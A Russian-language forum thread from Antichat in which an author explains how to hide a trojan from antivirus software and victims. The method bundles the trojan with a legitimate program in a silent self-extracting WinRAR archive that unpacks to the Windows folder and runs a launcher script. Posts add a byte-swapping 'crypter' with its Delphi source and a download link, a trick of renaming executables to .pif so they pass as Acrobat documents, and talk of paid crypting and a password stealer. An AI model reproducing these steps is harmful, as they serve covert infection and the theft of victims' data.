Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Авторские статьи (https://forum.antichat.xyz/forumdisplay.php?f=31)
-   -   Прячем трояны от антивирусов, пользователей, собак и кошек =) (https://forum.antichat.xyz/showthread.php?t=26491)

ReanimatoR 03.11.2006 21:23

Прячем трояны от антивирусов, пользователей, собак и кошек =)

И так у нас есть трой...НО он палится антивирями. Что делать? Идти покупать криптор - нет это не для нас... Писать свой трой или криптор - не все умеют, а иногда лень...
Теперь мы сделаем это подручными средствами за минуту...
Нужно: winRAR и программа crypter, написанная Talisman'ом специально для этого дела...
1. Подготавливаем внутренность архива.
Внутренности архива:

Ваши файлы + 3 следующих файла:
1. run.cmd
2. 1.exe
3. crypter.exe, найдете в конце статьи
----
1.exe - и есть ваш троянчек.
В run.cmd пишем следующее:
Код:

start yourprogramm.exe
start crypter.exe
start 1.exe
exit

, где yourprogramm.exe - ваша нормальная программа.
Что это делает?
при запуске run.cmd у нас запускается crypter.exe и все=)
Теперь рассмотрим crypter.exe:
Это всего навсего программа, которая меняет порядок байт в файле(то есть делает кашу). При первом запуске она меняет порядок файлов, при втором возвращает все на место.
-----
И так для первого шага кладем ваш exe'шный файл в какую-то папку, туда же кладем своего трояна с именем 1.exe, туда же кладем run.cmd с кодом выше^^ и туда же кладем cryptor.exe.
Теперь запускаем crypter.exe и у нас файл перепутался и антивирус теперь не палит его...

2. Делаем sfx архив:

Выделяем наши файлы и жмем добавить в архив.

Отмечаем пункт 'Создать SFX-архив'.

Переходим на вкладку дополнительно и жмем 'Параметры SFX'.

Переходим на вкладку Режимы и отмечаем пункт Скрыть все и Перезаписывать все файлы (теперь при запуске архива не будет выводиться никаких окон).

Переходим на вкладку Общие. Нас будет интересовать путь для распаковки. Можно здесь прописать путь к папке в которую будут извлекаться файлы. Все файлы будут извлекаться в одну папку. Можете написать "%windir%".

Иконку для результирующего исполняемого файла можно выбрать на вкладке Текст и Иконки , нажав на кнопку Обзор.

На вкладке Общие в поле выполнить после распаковки пишем run.cmd
---------
Дополнение:
Переименуем любой exe файл в pif.
О-ба! все работает так же=) но во-первых pif'a в винде не видно и во-вторых очень часто путают с документами Acrobat Reade'a ;)
---------
Pif с непропатченным браузером IE запускается при клике на ссылку, не нужно нажимать сохранить и так далее...
---------
Статья сделана на основе http://forum.antichat.ru/thread24979.html
Она будет постепенно обновляться, так как у меня есть еще очень много полезных идей, чтоб замаскировать троян от антивирусов.
============================
Crypter.exe:
Работает только с файлом с именем 1.exe
http://slil.ru/23344495
Написал Talisman

============================
Просьба писать о всех недочетах и ошибках, найденных в статье

~Real F@ck!~ 03.11.2006 23:12

ReanimatoR каспер 6 палит, последние обновления, обновления за месяц! Антивирь палит ИМХО.

ReanimatoR 03.11.2006 23:23

Ясное дело проактивная защита будет палить=)
а проскань на вирусджоти = не будет...
это еще не все=) я еще буду дописывать...
100% не палящийся способ= на этом яб не плохо заработал=)
А это инфа к размышлению и додумыванию

~Real F@ck!~ 03.11.2006 23:34

ReanimatoR ты б лучше криптор выложил для ламаков каких нибудь, у меня их довала, но они приватные и дать немогу(кстати я их взял бесплатно, сеть 2 месяца серфинговал)

Ksander 03.11.2006 23:39

Если выкладывать приватный криптор, то через пару дней о нем можно будет забыть, бо толку 0.

-SMith- 03.11.2006 23:42

~Real F@ck!~
Угумс, я видел....
Как на dl, про тебя писали что ты ко всем в аси лез и просил криптор
Смотреть тут

~Real F@ck!~ 03.11.2006 23:54

ReanimatoR ненадо выкладывать криптор, я так к слову сказал, у меня их довала, а кому надо тот пусть тему или ещё что нить создаёт!

Talisman 04.11.2006 00:50

Раскрою секрет криптора-кашеварителя :)
вся его суть заключается в изменении сигнатур программы 1.exe - чтобы не палили антивири, как это проще всего сделать? менять местами байты экзешника, причем чтобы не гемороится - симметричным менять алгоритмом - запустил криптор четное число раз - ничего не изменилось, а нечетное - прога превратилась в мусор.
Вот код на Делфи:
Код:

program krip;
uses
  SysUtils, Classes; // минимальный "карсет" программы
var
  f:tfileStream; // переменная, в которую поместим криптуемый файл
  s1,s2:byte; // перемещаемые байты
  s,ss:int64; // адреса в 64 ричной системе
  i:integer; // просто счетчик)
begin
 f:=tfilestream.create('1.exe', fmOpenReadWrite); // грузим файл на чтение и запись
 i:=222; // устанавливаем начальное значение счетчика в 222, чтобы не затереть PE - заголовок (хотя можно и затирать ) )
  while i<int(f.Size) do begin // пускаем цикл до длины файла
  s:=int64(i); // преобразуем счетчик в адрес типа int64
  ss:=int64(i+1); //получаем адрес следующего байта
  f.seek(s, soFromBeginning); // переходим в файле на s байт с начала файла
  f.read(s1,sizeof(s1)); // читаем значение байта в  s1
  f.seek(ss, soFromBeginning); // переходим в байт ss (следующий за s)
  f.read(s2,sizeof(s2)); // считываем s2
  f.seek(s, soFromBeginning); // переходим на s
  f.Write(s2,sizeof(s2)); // пишем s2
  f.seek(ss, soFromBeginning); // переходим на ss
  f.Write(s1,sizeof(s1)); // пишем s1
      // т.е. мы поменяли местами 2 идущих подряд байта
  i:=i+2; // увеличиваем счетчик на 2, чтобы менять байты парами, а не "лесенкой"
  end; // идем в начало цикла while
 f.free; // освобождаем файл
end. // завершаем работу)

~Real F@ck!~ 04.11.2006 00:57

Talisman +1
Ksander эт ты ачат позориш нах, я ваще в халяву попросился, меня непустили да ещё и вот это повесили, и ещё всё началось лиш из-за пинча 2.60 который с дамагелаба я выложил на античат!
Mukis несмеши людей, я за 1$ криптую а ты за 3$ ! У меня ток аваст палит и сё, если у тебя даже нечё непалит ты что то с ценой загнул!

ReanimatoR 04.11.2006 12:27

Мда...собрались люди...
1. удалите свой флуд. Разборки в ПМ
2. это НЕ КРИПТОР! Это всего навсего штука, которая делает из файла КАШУ. И чтоб запустить файл, нужно опять запустить эту прогу=). Это можно делать любым архиватотром, который поддерживает раззиповку с паролем из командной строки(например Orien)

Время: 03:53